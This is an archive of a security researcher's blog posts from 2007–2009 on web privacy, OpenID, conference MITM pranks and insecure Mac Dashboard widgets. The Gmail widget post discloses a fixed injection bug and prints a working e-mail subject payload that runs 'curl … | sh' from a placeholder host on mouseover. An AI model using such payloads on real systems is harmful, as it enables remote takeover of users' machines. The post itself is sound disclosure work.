Main

web stuff Archives

June 10, 2007

Forget cookies!

Client-side SQL rules. And it's rather useful: Google -- the site recently rated worst major web destination for privacy by Privacy International (rebuttal 1, rebuttal 2) -- has put out Google Gears, a browser extension which lets you use things like Google Reader in an offline mode. Functionality-wise, this seems to work nicely indeed, and I'll try it again as the next couple of flights come up -- reading blogs certainly sounds like good inflight entertainment.

The extension's key additions to today's infrastructure: You can reliably keep both Web applications and significant amounts of data locally, such as the last 2,000 blog posts, and you can talk to that data store in SQL. Applications that can use these facilities have all the abilities that cookies could ever give them, and then some more; cookies simply look boring against this.

It will be interesting to see whether (and how) the community overall takes up the tension between the functionality enabled and the privacy worries caused -- both -- by web applications' ability to link interactions much more reliably than today, and to store larger and more structured amounts of data on the client. The tension is, in fact, non-trivial: On the one hand, reliable client-side persistency clearly enables reliable linking of different interactions. On the other hand, applications could be designed to be more privacy-friendly by actually keeping information on the client, and not transmitting it to the server. If anything, this shows that discussions about privacy online can't be limited to the side-effects of this or that technology, but should actually focus on how the technology (and the data processed) are actually used.

Meanwhile, Opera's Anne van Kesteren points to Erik Arvidsson's blog, which talks about a submission of the interfaces exposed by Google Gears to WHATWG/W3C coming soon. Anne notes the relationship to related work in the HTML5 spec. (W3C's new HTML Working Group took up HTML5 as the basis for discussion with the editors and the WG going forward in May.)

PS: In terms of security models, both the HTML5 and Google Gears work rely on the same-origin policy that's well-known from cookie land.

September 2, 2007

OpenID over WS-Trust?

In an interesting example of how the different identity systems around play together (or not), SXIP has proposed an "OpenID infocards" spec. Allegedly, there is a working implementation around; I haven't tried it, though.

OpenID Information Cards 1.0 - Draft 01
D. Hardt, J. Bufu
Sxip Identity
August 10, 2007

"Infocards" in this context effectively means "OpenID over WS-Trust." Painting with a broad brush, this specification essentially takes OpenID's colon-separated-tag-value assertion format and embeds it with WS-Trust.

Signalling that a relying party supports this protocol variant is not interoperable with the signalling used traditionally in OpenID.

An OpenId infocards relying party needs to understand an additional -- though quite lightweight -- protocol exchange which wraps the OpenId token into token XML pointy brackets, to Paul Madsen's immense delight.

An OpenId infocards provider needs to implement a WS-Trust Security Token Service.

The protocol interchanges are not interoperable with the ones traditionally used in OpenID: Steps 1-6 of the OpenID protocol are replaced with WS-Trust based interactions. Step 7, in its "direct verification" variant, remains in place, and ensures that the identity (still a URI) remains bound to the overall transaction.

Conversely, there are similar implications for Infocard enabled services that would want to support this scheme; for them, the OpenID infocards spec effectively introduces yet another token format. See Eric Norman's blog.

On its face, this proposal suggests splitting the OpenID protocol into two not mutually interoperable variants, one fitting into Microsoft's cardspace framework, and one having all the lightweight RESTful karma that makes OpenID interesting to the parts of the Web community that are less than fond of WS-*. The URL as an identity paradigm is much less central to this variant of OpenID than to the classical one: For much of the protocol exchange, what matters is the endpoint that serves as the Security Token Service. The "identity" URL itself only ever plays a role in the final verification step.

All this points to interesting times ahead, as the various camps in identity space will continue to perform tangled dances.

October 20, 2007

hack.lu: Breaking and Securing Web Applications

At hack.lu, the best talk so far is Nitesh Dhanjani's talk Breaking and Securing Web applications.

Random notes below the fold.

Continue reading "hack.lu: Breaking and Securing Web Applications" »

hack.lu: MITMing a room full of security people

In Pwned @ hack.lu, Didier Stevens has a nice screenshot of what a lot of people saw at the conference yesterday. Not trusting the crowd in the room, I had configured my Web browser to go through an SSH tunnel elsewhere, so the software that was affected for me was fetchmail -- which I had fortunately configured paranoid enough that it noticed the wacky certificate that was "shown" by my personal server on port 995, pop3-s, and simply died with a nice error message.

So, what happened? As I said in a spontaneous lightning talk after that session, my diagnosis was that somebody was running a man-in-the-middle attack on a room full of security people. The tool they were using rewrote the TLS certificates that were shown by servers, but tried to keep the human-readable information in the certificate intact. (As Benny K notes in a comment, "the certificate seemed fine".)

The tool used was most likely ettercap.

Incidentally, I don't mind that this prank was played on all of us. Attending a hacking conference means you're fair game to some extent -- there will be packet sniffing, and there will be active attacks. As long as no lasting damage is caused, and as long as the attacks don't interfere with the conference talks, that's fine. What I found disappointing, though, is that the responsible party didn't have the stomach to give a lightning talk about the results gathered. For instance, I'd love to know how many of the (security-minded!) people in the room actually clicked past the errors that their browsers and mail clients showed. That would be first-class input for the Web Security Context Working Group. (Anecdotal evidence suggests that a few people got rather nervous after they heard the lightning talk...)

Now, for the details...

Continue reading "hack.lu: MITMing a room full of security people" »

October 21, 2007

hack.lu: slides

I guess a conference counts as good fun when you go there to listen and end up giving two lightning talks and a not really lightning talk. So, for the record, here we go:

The slides should be linked from the conference program sooner or later.

November 15, 2007

Facebook: Third-party cookies on steroids

In Privacy versus cross-context aggregation, Wendy Seltzer points to stories by David Weinberger and Ethan Zuckerman about facebook's latest marketing coup: When facebook users go shopping online (e.g., with Blockbuster) then their shopping behavior is pushed to facebook and used for advertising. From Weinberger's description:

The new ad infrastructure enables Facebook to extend their reach onto other companies' sites. For example, if you rent a copy of "Biodome" from Blockbuster.com, Blockbuster will look for a Facebook cookie on your computer. If it finds one, it will send a ping to Facebook. The Blockbuster site will pop up a "toast" (= popup) asking if you want to let your friends at Facebook know that you rented "Biodome." If you say yes, next time you log into Facebook, Facebook will ask you to confirm that you want to let your friends know of your recent rental. If you say yes, that becomes an event that's propagated in the news feed going to your friends.

While, technically, Blockbuster can't look for a facebook cookie, it can give facebook the opportunity to look for it itself, and in the process hand off information about the purchase. That can be done through redirects, frames, or any other number of techniques. Some of these techniques involve JavaScript, some don't. Ultimately, what we have here is the return of the 1990s third-party cookie, but on steroids, and used not just to track users' page views, but to link business information across vendors.

(Not having either a facebook or a Blockbuster acocunt, I don't know what the precise technique used is; I'd be curious to learn more about that. If anyone feels like drilling down further, tamper data and Firebug are among the tools of choice.)

The more general point, though, is independent of the precise mechanism used to pass on the data: Today's Web is an environment in which applications have lots of opportunities to communicate among each other, to aggregate data, and to mash-up information from different sources. What is useful infrastructure in a Web 2.0 application becomes a privacy threat when used maliciously.

Enabling social processes becomes key: How can we make sure Web applications' data flows become comprehensible to users -- both from an infrastructure and a usability perspective? And how can we make sure Web application providers need to state their intentions transparently, providing levers for social and regulatory enforcement? These questions bring us back all the way to P3P; using P3P policies as a trigger for cookie handling in IE6 demonstrated how to use technical capabilities as a lever to enable at least some social transparency of business behavior.

Maybe we need another generation of simple policy languages that enable a similar tie-in, but for a broader set of use cases: Placing Cookies in HTTP headers is hardly the main concern any more. Forget cookies if you can get client side SQL and client-side global data storage. Forget web bugs for data leaks if Javascript can submit() forms cross-domain (and xforms have the same feature, but declaratively). And forget forms if events can cause the user's every keypress and mouse click to trigger an XMLHttpRequest() object to phone home (soon cross-domain). In today's environment, the ping attribute on links almost comes as a relief, as it enables easier spotting of tracking techniques -- along with easier tracking. If, as a community, we want to use technical levers to entice Web application providers to behave in a socially transparent and responsible way, then we need to take a comprehensive approach, start to understand what technical control points we still have, and how we can use them.

Meanwhile, our best chance to holding sites honest are the kind of public shaming that facebook is experiencing, law enforcement, and regulation (where applicable) -- if anybody notices what's going on, that is.

December 3, 2007

JSON + eval(): Owning the Dashboard

Twitter has been all the rage for a while; I'll admit that I've been a late adopter (I've had an account since yesterday). It seems useful as a quick news agregator (with feeds like the NY Times and Heise) -- in particular when coupled to a dashboard widget on the Mac.

There are two dashboard widgets that let you both post and follow: Twitterlex and Twitgit. In plain English, both of these are huge security risks that create an easy way for an attacker on your network to take over your Mac. Uninstall them till there are new versions.

In technical terms, both are relatively simple pieces of JavaScript. Both use JSON to retrieve their data through the Twitter API. Both use eval() to evaluate the JSON data.

And that's a pretty big deal: JSON is short for JavaScript Object Notation. That means that data are encoded in a subset of the JavaScript programming language, the same language that these two widgets are written in. eval(), then, is the simplest way to parse that information: Instead of doing anything fancy, the data are fed to the JavaScript interpreter. Which will do its thing, and duly interpret whatever it is given.

And, for these Widgets, there is no sandbox to the rescue: While bad (and unsafe) JavaScript is a matter that affects just the perpetrator when it happens on an ordinary Web page, the sandbox for Dashboad widgets is actually configurable, Needless to say, both widgets are using that configurability: They both have the AllowSystem option set, to enable the widget.system() function. That method is used to execute arbitrary command line utilities, i.e., it grants as full control over the system as the user has -- and that often includes control over the /Applications folder.

Twitterlex, incidentally, at least has a reason to open the sandbox, using Growl for notifications. Quickly looking through Twidgit, I couldn't find any there, except that there was probably an example somewhere with the same code in it. Twitterlex makes up for this slight advantage by having an update notification mechanism that calls eval() on data retrieved from some URI on the programmer's Web server. What's currently returned from there looks benign; still, this would make for a marvelous backdoor.

How realistic are attacks against this kind of code? Very much so. Both widgets check Twitter regularly. Risks -- leaving malice on the side of one of the "legitimate" data providers aside for a moment -- include a subverted Twitter server (cross-site scripting will be enough, even though Twitter fortunately appears to be quite paranoid about that), a subverted server on the author's side in the case of Twitterlex, and a man-in-the-middle attack against the data retrieval. The latter is quite easy to launch, as no cryptographic protection is used at all: Either ettercap or a subverted captive portal will do nicely.

All this illustrates some security fundamentals: When there are easy, but insecure, options, people will exercise them. If they can use eval() instead of JSON.parse(), they will do that. If they can break out of a sandbox, they"ll do that. In particular if that doesn't keep the widgets from being installed. And if these two things can be done in one widget to make life more interesting, then that will happen, too.

Finally, if the same programming platform can be used locally that is known from the Web, then we'll see the same programming style (and mistakes), and we'll see local and Web vulnerabilities blur into each other.

December 4, 2007

Show me a JSON-based Widget...

... and I show you an unguarded eval().

Today's examples:

  • The Facebook Widget accesses about a dozen facebook APIs through JSON. It's based on the facebook JS Library. And guess what the parseJSON routine in that library really is? This widget runs with the AllowFullAccess configuration option set.
  • The Flickr Interestingness widget is another culprit. This one only runs with the AllowInternetPlugins flag; if subverted, it might give an attacker access to, say, the latest Quicktime hole. Don't think it's enough to secure your browser.
  • The Hockey Widget doesn't do JSON; instead, it loads some web page and parses an embedded script by, you guess it, feeding it to eval(), after some minor searching and replacing. AllowNetworkAccess is set.

The bad teaching award of the day goes to the AOL Xdrive developer documentation: The Open XDrive Usage Meter of course accesses XDrive through JSON, and of course it uses eval() to parse. It has a sibling Windows Vista sidebar gadget; same problem. By the way, the security model for these gadgets gives access to ActiveX controls that are not marked "safe for scripting".

Questions?

December 8, 2007

More on widgets: Exploring the Network

In my last musings about widget security, I was very brief about the Flickr Interestingness and Hockey widgets. After all, they both just provide the AllowNetworkAccess capability. I had overlooked that there is a shared cookie store on the Mac, shared, that is, at least by Safari and the Dashboard. From a bit of experimenting, it seems like that sharing affects all non-session cookies.

Now, what does that mean? A widget with the AllowNetworkAccess privilege can issue HTTP requests anywhere. These HTTP requests will carry the same cookies as a request from a just-started Safari instance. Therefore, any Web application that relies on persistent cookies for authentication (like many Web 2.0 services) can be used by such a Widget without the user's permission.

There are several attack scenarios here: A subverted widget could be a bridgehead behind a corporate firewall, with convenient access to intranet applications. And when a Web 2.0 site serves as the path through which a widget is exploited, then subverting widgets with AllowNetworkAccess might in fact be enough to deploy some rather interesting malware.

December 19, 2007

More on widgets: When one e-mail is enough to break a system.

Excuse the widget blogging hiatus, please; I held back on this one till Google had rolled out a fix.

Our topic today, then, is the Gmail dashboard widget -- a handy dashboard frontend to Google Mail. As so many other widgets, this one, too, runs with access to the widget.system method. However, the bug in question here does not relate to eval(). Instead, it's script-injection into the DOM due to a lack of output cleansing in the client-side JavaScript code. It's, effectively, the same kind of vulnerability that underlies cross-site-scripting vulnerabilities in servers; for a change, however, this is a client-side problem.

Consider this code fragment:

      var titleText = MessagesTable
           .getTitleTextFromEntryElement(currentEntry);
      titleText =
          '&nbsp;&nbsp;&nbsp;<span class="title-class">' 
          + titleText
          + '</span>';
      if (Prefs.getShowSnippets()) {
        var summaryText = MessagesTable.getSummary(currentEntry);
        summaryText = '<span class="snippet-class"> - ' 
          + summaryText
          + '</span>';
        titleText += summaryText;
      }
      titleText = "<div class='table-overflow-col'>" 
        + titleText + "</div>";
      ...
      titleColumn.innerHTML = titleText;

The use of the non-standard innerHTML property to write to the DOM here means that, if we can inject tags into the titleText variable, we can actually write tags into that document object model.

Instead of reading more code, I sent a first message to my GMail account, with this subject:

 Subject: <i>italic?</i>

Now, guess how that message came out in the GMail widget... So, we can write tags into the DOM. The simple approach of just dropping some <script> tags into the subject header failed, though: innerHTML doesn't actually execute scripts right away.

However, this worked:

Subject: <a href="#" onmouseover=
  'var foo=widget.system ("curl http://does-not-exist.org/test
  | sh", null).outputString;'><span class="title-class">hi 
  there</span></a>

As soon as the mouse pointer hovered over the subject header of this message, a shell script would be downloaded from my web server, and then executed, with the user's privileges -- the machine was taken over by sending a single e-mail, combined with a likely and innocuous user interaction.

What this example (as the other, earlier ones) demonstrates is that, as Web technologies move to the desktop, bad coding practices move with them. However, what was once a problem that might affect one server-side application now tuns into a way to subvert client computers -- easily, quickly, and thoroughly, and with no more tools than the ability to write a simple e-mail.

Possible fixes to this problem include escaping any user-supplied data that is expected to contain text before feeding it to dangerous programming constructs such as .innerHTML, or using safer programming constructs such as createTextNode.

The recent observations about widgets suggest several more general points, though: On the one hand, figuring out useful security models for widgets is an important task (that the W3C Web Application Formats Working Group, which works on a widget format, will have to take on, together with the various widget vendors).

On the other hand, it's clear that fancy security models are not enough: We need to spread the word about sane programming practices for widgets, and quite likely some code review from those who advertise others' code as safe to download.

Finally, these kinds of issues are not just a problem with widgets: Just this Wednesday, Orkut was hit by a worm that was exploiting server-side cross-site scripting vulnerabilities. As we see more and more cross-site requests and data flows -- either through cross-site XMLHttpRequest, or through deliberate cross-site script inclusion --, we'll see attacks like these cross site boundaries. We'll also see combined server and client-side attacks, just enabled by web technologies.

I hope to talk more about this at this year's Chaos Communication Congress in Berlin, and perhaps at the Web Conference next April in Beijing.

December 28, 2007

When Widgets Go Bad

My lightning talk from 24c3 this morning, on youtube:

May 27, 2008

Some recent talks: Usability, Policy languages, Widgets, and HTML5

Blogging has been light here for a while, though Twittering hasn't.

The past few months have seen a busy travel schedule and a number of talks; maybe time to quickly dump links to the various slide sets here:

  • At RSA Conference in San Francisco, I spoke on a panel about security usability with fellow Web Security Context Working Group members Mary Ellen Zurko, Rachna Dhamija, and Phillip Hallam-Baker. No slides, but a reasonably nice discussion.
  • At the Web Conference in Beijing, just two weeks later, I ended up on a panel on policy languages, with Renato Iannella, Piero Bonatti, and Lalana Kagal.
  • Also at the Web Conference, I spoke about Widgets - Web Vulnerabilities for All, taking a look under the hood of some commonly found widgets, and explaining how they can be used to break into your computer. As much as I like that Widgets are making it easier to write portable network client applications, as much do I think that the current platforms' security models make it far too risky to actually run these beasts. We've got some catch-up work to do there.
  • In Web Application Security Issues at the same conference, I also talked about widgets, but then asked the question what the programming practices there tell us about the future of Web Applications, when ever more security critical code actually runs on the client. That outlook is rather dark right now, in terms of security. (Although it won't get much worse than the current situation.)
  • Finally, I went to nearby Ghent, to talk about HTML5 and what's security relevant in there. Slides here: Would you like fries with that? In short, there's a bunch of good work being done in that spec, but other parts need some serious attention from the security community.

July 3, 2008

Youtube data disclosures: The limits of data governance.

Wired.com reports that a US judge compelled YouTube Google to turn over its complete user logs - including time stamps and IP addresses, which might be used to discover the real life identity behind a request.

Denied motions in the same decision include the disclosure of Google's and Youtube's search engine source code, private videos, and various database schemata.

Leaving aside that Viacom's demand for assorted crown jewels smells of an attempt to force YouTube into a settlement, the judge's decision really is a staggering example of the limits of data governance: Building data avoidance into protocols and services makes privacy-threatening disclosures hard or impossible; it also limits the usefulness of some services. But approaches that accept (almost unlimited) storage and processing of data (and then rely on technology and procedures to enforce certain rules) are ultimately limited by the ability of the surrounding legal and social system to stick to these rules. That really means two things: On the one hand, the social context needs to hold data processors accountable for the privacy promises that they make. On the other hand, it must not turn into a threat to these promises itself.

This case is a particularly spectacular example of the latter aspect, made worse by an environment in which little is ever forgotten.

Food for thought when you next dump personal data into some Web 2.0 information silo.

July 20, 2008

Si tacuisses, Enrique, ...

Among the great privileges of working at W3C is the occasional geeking with people like Michael Sperberg-McQueen's evil twin Enrique.

Enrique's latest is on what RDF gets us. In that blog item, RDF is characterized as an extremely thin semantic layer -- interestingly, ignoring the RDF Semantics recommendation. The point of that recommendation is that RDF is -- even when you ignore RDF schema, OWL and friends -- more than just nodes, arrows, and URIs.

Continue reading "Si tacuisses, Enrique, ..." »

February 22, 2009

Facebook me!

While I'm usually comfortable using social networks of all kinds, I hadn't ever joined Facebook.

Well, the recent ruckus about their terms of service tickled my interest sufficiently that I finally gave in. no-such-thing.png There really is no such thing as bad publicity for facebook.

Now, what's interesting about it for this latecomer? Beside not finding much actually useful or new on facebook (well, perhaps except for new lows in advertisingim-a-jerk.png), two points really struck me: An incredibly simple user interface, literally going out of the way when it should, making it as easy as at all possible to let me do what I'd most likely want to do -- and all that, of course, within the walled garden's fences. As an exhibit, consider the exchange between Ann Bassetti and myself up there: With Twitter, I'd have linked to it. In Facebook, it seems like I can't do that, so your only chance is going into the walled garden and trying to search for it. Second, a subtle persuasion that I'm safe and secure there. For the first couple of "friends", I'm bothered with a CAPTCHA (which goes away eventually), to "make sure I'm legit"; when I "friend" somebody who isn't in the "same network" as I am, I'm politely told that (and why!) I can't see their profile. Nothing like letting your users softly run into limits if you want to convince them that they're protected by these limits, and that you're their friend, by enforcing these limits. Remember: Facebook is your friend, it is not scary, and it helps you keep your privacy. There is nothing that Facebook would ever do wrong with your data. It helps you keep your privacy.

It's almost fortunate, then, that Facebook also inflicted one of its little indiscretions on me...

iphone.png

I hadn't quite told the world that I had given in to that particular temptation, yet, despite some misgivings on principles. Well, this takes care of that.

So, what's the conclusion? So far, Facebook indeed very much looks like Hotel California, with nice rooms, and a somewhat chatty concierge. Nothing to see here as far as I'm concerned, except for network effects in action, and some really neat persuasion packed into UI.

(Good that I can use Twitter to update my status.)

March 27, 2009

Persistence is hard.

Keeping historical documents around is hard, as my native city of Cologne painfully experienced a few weeks ago, when the city archive collapsed.

But it's also hard on the web. Case in point, a number of important early specifications for the Web (like pre-standard SSL, or the original Cookie spec) have traditionally been sitting at netscape.com URIs. Unfortunately, AOL seems to have pulled these pages around the time they disbanded the remains of Netscape.

While the wayback machine helps us out this time, one would wish that organizations that acquire historically important technology spent more effort preserving the documents they have. With the consolidation that the economic crisis will bring, I fear that this hasn't been the last time that these kinds of historical documents disappear from their canonical location.

About web stuff

This page contains an archive of all entries posted to No Such Weblog in the web stuff category. They are listed from oldest to newest.

Usability is the previous category.

WOS3 is the next category.

Many more can be found on the main index page or by looking through the archives.

Creative Commons License
This weblog is licensed under a Creative Commons License.
Powered by
Movable Type 3.35